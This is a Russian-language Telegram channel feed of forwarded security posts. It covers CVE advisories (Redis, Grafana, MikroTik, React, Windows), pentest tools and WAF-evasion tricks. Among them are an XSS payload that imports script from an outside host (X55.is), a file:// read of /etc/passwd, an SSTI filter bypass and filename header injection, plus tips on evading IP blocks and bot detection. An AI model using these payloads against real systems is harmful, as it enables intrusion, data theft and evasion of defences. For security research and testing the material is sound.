Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🤯2
Forwarded from Pentest Notes
Подготовил для вас подробное руководство по тестированию на проникновение Outlook Web Access (OWA). 😈
➡️ В статье я разобрал все основные атаки и уязвимости OWA. Собрал и структурировал самое полезное в одном месте.
➡️ Также материал идеально подойдет для тех, кто все еще путает между собой OWA, Outlook и MS Exchange :)
Даже если вы раньше не сталкивались с почтовыми сервисами Microsoft, после прочтения смело можете бежать проверять их на безопасность.🥤
Ссылка на статью
💫 @pentestnotes | #pentest #OWA #Exchange
Даже если вы раньше не сталкивались с почтовыми сервисами Microsoft, после прочтения смело можете бежать проверять их на безопасность.
Ссылка на статью
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Forwarded from SecuriXy.kz
🛡️ #RediShell - CVE-2025-49844
CVSS Score: 10.0 (Critical)
13-летняя уязвимость в Lua-парсере Redis позволяет выйти из песочницы Lua и получить RCE на хосте. Оценка экспозиции ~330000 инстансов в сети, около 60000 без аутентификации.
Что делать
1 Обновить Redis до версий с фиксом (например 8.2.2 и выше или эквивалентные патчи для веток)
2 Закрыть доступ Redis из интернета, допускать подключения только из доверенных сетей
3 Включить аутентификацию, запускать Redis от непривилегированного пользователя
4 Если патчить невозможно сразу - временно запретить выполнение Lua-скриптов
🔬 PoC для локальной лабораторной проверки
📎 Источник и разъяснения: BleepingComputer
CVSS Score: 10.0 (Critical)
13-летняя уязвимость в Lua-парсере Redis позволяет выйти из песочницы Lua и получить RCE на хосте. Оценка экспозиции ~330000 инстансов в сети, около 60000 без аутентификации.
Что делать
1 Обновить Redis до версий с фиксом (например 8.2.2 и выше или эквивалентные патчи для веток)
2 Закрыть доступ Redis из интернета, допускать подключения только из доверенных сетей
3 Включить аутентификацию, запускать Redis от непривилегированного пользователя
4 Если патчить невозможно сразу - временно запретить выполнение Lua-скриптов
🔬 PoC для локальной лабораторной проверки
📎 Источник и разъяснения: BleepingComputer
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
Очень часто во время пентестов внешнего периметра возникает ситуация, когда различные СЗИ блокируют адреса атакующей инфраструктуры в автоматизированном режиме, что немного затрудняет процесс сканирования открытых портов и фазинга директорий и файлов. Концептуальное решение для обхода, такое же очевидное как и сам принцип блокировок, использовать "карусель проксей", чтобы каждый запрос летел с нового source ip😎
Уже давно существуют утилиты с открытым исходным кодом, которые решают эту задачу, например FireProx для использования пула адресов Amazon через
После длинного предисловия, хочу поделиться новым инструментом - FlareProx, для решения этой задачи с использованием пула ip адресов
✅ Утилита на python3, поддерживает все HTTP методы (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
✅ Огромный пул адресов
✅ Лимит запросов - 100k/ежедневно на бесплатном уровне подписки
Таким образом, у нас в арсенале появился еще один инструмент для обхода блокировок по source ip, который точно не будет лишним на проектах в формате тестирований на проникновение внешнего периметра.
Очень часто во время пентестов внешнего периметра возникает ситуация, когда различные СЗИ блокируют адреса атакующей инфраструктуры в автоматизированном режиме, что немного затрудняет процесс сканирования открытых портов и фазинга директорий и файлов. Концептуальное решение для обхода, такое же очевидное как и сам принцип блокировок, использовать "карусель проксей", чтобы каждый запрос летел с нового source ip😎
Уже давно существуют утилиты с открытым исходным кодом, которые решают эту задачу, например FireProx для использования пула адресов Amazon через
AWS API Gateway, к тому же абсолютно не сложно написать свое кастомное решение😜 Мы в своей практике для этих целей используем Yandex API Gateway, Yandex Cloud Functions и резидентские прокси + немного python в случаях с особо трепетными СЗИ, которые по дефолту блокируют пулы адресов публичных облачных провайдеров.После длинного предисловия, хочу поделиться новым инструментом - FlareProx, для решения этой задачи с использованием пула ip адресов
Cloudflare Workers.✅ Утилита на python3, поддерживает все HTTP методы (GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD)
✅ Огромный пул адресов
Cloudflare✅ Лимит запросов - 100k/ежедневно на бесплатном уровне подписки
CloudflareТаким образом, у нас в арсенале появился еще один инструмент для обхода блокировок по source ip, который точно не будет лишним на проектах в формате тестирований на проникновение внешнего периметра.
GitHub
GitHub - ustayready/fireprox: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation - ustayready/fireprox
🔥4
Forwarded from Fail Auth
Всем привет!
Довольно часто на проектах попадается Microsoft Outlook Web Access (OWA).
Столкнулся с проблемой установки инcтрумента PEAS, который помогает протестировать ActiveSync (EAS).
EAS - протокол Microsoft для синхронизации мобильных устройств с Exchange Server.
Утилита устарела, написана под Python 2 и требует ручной правки зависимостей.
В итоге решил проблему с помощью docker.
git clone https://github.com/snovvcrash/peas ~/tools/peas-m && cd ~/tools/peas-m
python3 -m virtualenv --python=/usr/bin/python venv && source ./venv/bin/activate
🐳 Создаем Dockerfile внутри директории рядом с файлом requirements.txt
FROM python:2.7-slim
RUN sed -i 's|deb.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
sed -i 's|security.debian.org|archive.debian.org|g' /etc/apt/sources.list && \
apt update && \
apt install -y git build-essential libxml2-dev libxslt1-dev libffi-dev libssl-dev
RUN git clone https://github.com/snovvcrash/peas /opt/peas
WORKDIR /opt/peas
RUN pip install -r requirements.txt
ENTRYPOINT ["python", "-m", "peas"]
sudo docker build -t peas-py2 .
✔️ Запуск и работа с утилитой:
sudo docker run --rm --net=host -v "$PWD/peas-out":/opt/peas/out peas-py2 -u 'DOMEN\test' -p 'Password123' example.com --list-unc='\\DC-name\' --check
Надеюсь, кому-то пригодится!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
Forwarded from SHADOW:Group
Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как
В таких случаях часто на помощь приходит функция
Для эксплуатации я использовал пэйлоад
Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#web #waf #xss
alert, document.cookie и других.В таких случаях часто на помощь приходит функция
import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации.Для эксплуатации я использовал пэйлоад
Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert.Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.javascript:import('//X55.is')//#alert('shdw')#web #waf #xss
🔥5👍1
Forwarded from Brut Security
🚨 CVE-2025-61481 (CVSS 10.0) : Critical MikroTik Flaw Exposes Router Admin Credentials Over Unencrypted HTTP WebFig. It affects RouterOS v.7.14.2 and SwitchOS v.2.18.
👇Dork:
HUNTER : http://product.name="MikroTik RouterOS"||http://product.name="MikroTik SwOS"
👇Dork:
HUNTER : http://product.name="MikroTik RouterOS"||http://product.name="MikroTik SwOS"
❤2
Forwarded from 1N73LL1G3NC3
CVE-2025-60710 Local Privilege Escalation in Taskhost Windows Tasks
This is PoC for local privilege escalation vulnerability in \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration scheduled task.
When this scheduled task is started the taskhostw.exe process whill try to open the C:\Users\%username%\AppData\Local\CoreAIPlatform.00\UKP directory and search for directories using the following filter: {????????-????-????-????-????????????}. If that directory is found it will be deleted without checking for symbolic links.
As low privilege user by default can create directories in their own %LOCALAPPDATA% folder this leads to arbitrary folder delete in context of NT AUTHORITY\SYSTEM user.
This is PoC for local privilege escalation vulnerability in \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration scheduled task.
When this scheduled task is started the taskhostw.exe process whill try to open the C:\Users\%username%\AppData\Local\CoreAIPlatform.00\UKP directory and search for directories using the following filter: {????????-????-????-????-????????????}. If that directory is found it will be deleted without checking for symbolic links.
As low privilege user by default can create directories in their own %LOCALAPPDATA% folder this leads to arbitrary folder delete in context of NT AUTHORITY\SYSTEM user.
🔥3❤1
Forwarded from ZeroNights
Впервые на большом экране — программа 11-ой конференции по практическим аспектам информационной безопасности ZeroNights 2025 со всеми таймингами и распределением докладов по трекам.
Посмотрите и распланируйте маршрут своего 26-го ноября — потому что день обещает быть насыщенным
А в скором времени мы анонсируем доклады и воркшопы для Community Hub, stay tuned
26 ноября 2025
Санкт-Петербург, LOFT HALL #7
Купить билеты
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🤯4
Forwarded from SecuriXy.kz
🚨 CVE-2025-41115 (Grafana Enterprise, CVSS 10.0). Коротко: SCIM включен → риск захвата админки. Обновиться немедленно.
Уязвимость в SCIM provisioning - можно подменить
Затронуты: Grafana Enterprise 12.0.0-12.2.1
Фикс: обновиться до 12.0.6 / 12.1.3 / 12.2.1 (patched) / 12.3.0
✅ Чеклист:
1 Проверить, включен ли SCIM (enableSCIM, user_sync_enabled).
2 Если не нужен - отключить.
3 Срочно обновить Grafana.
4 Мониторить журналы и входы.
PoC: GitHub — Blackash-CVE-2025-41115
Уязвимость в SCIM provisioning - можно подменить
externalId и войти под любым пользователем, включая админа.Затронуты: Grafana Enterprise 12.0.0-12.2.1
Фикс: обновиться до 12.0.6 / 12.1.3 / 12.2.1 (patched) / 12.3.0
✅ Чеклист:
1 Проверить, включен ли SCIM (enableSCIM, user_sync_enabled).
2 Если не нужен - отключить.
3 Срочно обновить Grafana.
4 Мониторить журналы и входы.
PoC: GitHub — Blackash-CVE-2025-41115
Forwarded from вольтаж
file://localhost/etc/passwd что вернёт?
В RFC 8089, верный формат протокола описан как
file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path>Причём, в
<host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок
from urllib.request import urlopen
content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')
print(content)
Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня.
В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.
Представим, ты нашёл SSTI, но WAF блокирует символ$
Что делать?
Неприятно, но не критично, ведь в Python / Perl возможно представить символ через
\N{CHARACTER NAME}. Пример обхода фильтра
\N{dollar sign}{7*7} == ${7*7} == 49Уже на стену лезешь? Погоди, я с тобой ещё не закончил.
Давай дальше по загрузке файлов. Видел же в
Content-Disposition есть параметр filename?В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты
# RFC 6266
filename="image.png"
# RFC 8187
filename*=UTF8''image%0a.png
RFC 8187 вводит новые правила для
filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (
%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . .
FOMO карусель закрыта.
Как восстановишь силы, пробегись по статье автора ради:
⚀ разбор CVE из-за проблем синтаксиса [^]
⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^]
⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]
Затем разнеси CTF по ресерчу
1. обход фильтров SSTI [^]
2. иной подход к протоколу file:// [^]
3. проломparse_urlв PHP [^]
#web #waf_bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5
Forwarded from Заметки Слонсера (Slonser)
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
React UNAUTH RCE
CVSS 10
По патчу успел понять в чем проблема (PoC пока пишу)
Уже сейчас могу сказать что похоже действительно уязвимы прям стандартные версии
То есть разработчику не нужно даже написать стремный код / использовать конкретный модуль
Достаточно написать:
То есть имеем очень страшное RCE by default на миллионах сайтов
Реверсим патч и лутаем миллионы на багбаунти...
React UNAUTH RCE
CVSS 10
По патчу успел понять в чем проблема (PoC пока пишу)
Уже сейчас могу сказать что похоже действительно уязвимы прям стандартные версии
То есть разработчику не нужно даже написать стремный код / использовать конкретный модуль
Достаточно написать:
npx create-next-app
То есть имеем очень страшное RCE by default на миллионах сайтов
Реверсим патч и лутаем миллионы на багбаунти...
Ссылка на эксплоит: https://github.com/ejpir/CVE-2025-55182-poc
YAML-шаблон для nuclei: https://github.com/sickwell/CVE-2025-55182/blob/main/cve-2025-55182.yaml
Да, он действительно работает.
По крайней мере в лабе😋
YAML-шаблон для nuclei: https://github.com/sickwell/CVE-2025-55182/blob/main/cve-2025-55182.yaml
Да, он действительно работает.
По крайней мере в лабе
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AD_POHEQUE
апдейт по React-RCE.
списался с несколькими своими коллегами, кто тоже ковыряет эту историю. да, нас всех конкретно сбила с толку публичная демка.
но важно другое.
сам автор уязвимости / эксплойта прямым текстом сказал:
то, что сейчас гуляет по паблику — шляпа.
https://react2shell.com/
мы пошли по ложному следу.
нормальный рабочий вектор — есть, надо стараться жёстче.
по факту у нас что есть:
- десериализация
- модель угроз для RSC остаётся очень жирной
- просто путь эксплуатации явно сложнее, чем “запусти vm.runInThisContext и внедри команду”
сейчас я пойду прогуляюсь, подышу прекрасным московским воздухом,
потом закрою пару важных дел по основной движухе
и этой же ночью продолжу копать реальный вектор.
отдельно спасибо всем, кто отозвался.
проснуться к вечеру, увидеть плюс к подписчикам и корректную обратную связь — это кайф.
дальше контента будет больше: тут в основном внутрянка, AD, Red Team, оффенсив, всё как вы любите.
и да, RCE-класс уязвимости в таком звере, как React, — это жирный таргет для всех:
внутрянщиков, веберов, мобилщиков, аппсек спецов.
если оно там есть — это уже архитектурная история, а не просто “ещё один баг”.
ну и главное, что ещё раз всплыло за эту ночь:
когда реально ресёрчишь, тебя будет качать.
то “всё фейк”, то “это абсурд”, то “я вообще не туда смотрю”.
нормально.
главное — не терять голову и не терять веру в то, что ты докопаешься до сути.
остальное — шум.
👾
списался с несколькими своими коллегами, кто тоже ковыряет эту историю. да, нас всех конкретно сбила с толку публичная демка.
но важно другое.
сам автор уязвимости / эксплойта прямым текстом сказал:
то, что сейчас гуляет по паблику — шляпа.
https://react2shell.com/
мы пошли по ложному следу.
нормальный рабочий вектор — есть, надо стараться жёстче.
по факту у нас что есть:
- десериализация
- модель угроз для RSC остаётся очень жирной
- просто путь эксплуатации явно сложнее, чем “запусти vm.runInThisContext и внедри команду”
сейчас я пойду прогуляюсь, подышу прекрасным московским воздухом,
потом закрою пару важных дел по основной движухе
и этой же ночью продолжу копать реальный вектор.
отдельно спасибо всем, кто отозвался.
проснуться к вечеру, увидеть плюс к подписчикам и корректную обратную связь — это кайф.
дальше контента будет больше: тут в основном внутрянка, AD, Red Team, оффенсив, всё как вы любите.
и да, RCE-класс уязвимости в таком звере, как React, — это жирный таргет для всех:
внутрянщиков, веберов, мобилщиков, аппсек спецов.
если оно там есть — это уже архитектурная история, а не просто “ещё один баг”.
ну и главное, что ещё раз всплыло за эту ночь:
когда реально ресёрчишь, тебя будет качать.
то “всё фейк”, то “это абсурд”, то “я вообще не туда смотрю”.
нормально.
главное — не терять голову и не терять веру в то, что ты докопаешься до сути.
остальное — шум.
👾
Telegram
AD_POHEQUE
Будь тем, чем другие не были.
https://boosty.to/ghe770mvp
https://boosty.to/ghe770mvp
Forwarded from #bugbountytips
This media is not supported in your browser
VIEW IN TELEGRAM
Cloudflare has recently started blocking proxy tools such as Burp Suite by detecting their unique TLS and request fingerprints.
If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block.
https://github.com/PortSwigger/bypass-bot-detection
#bugbountytips
If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block.
https://github.com/PortSwigger/bypass-bot-detection
#bugbountytips
👍4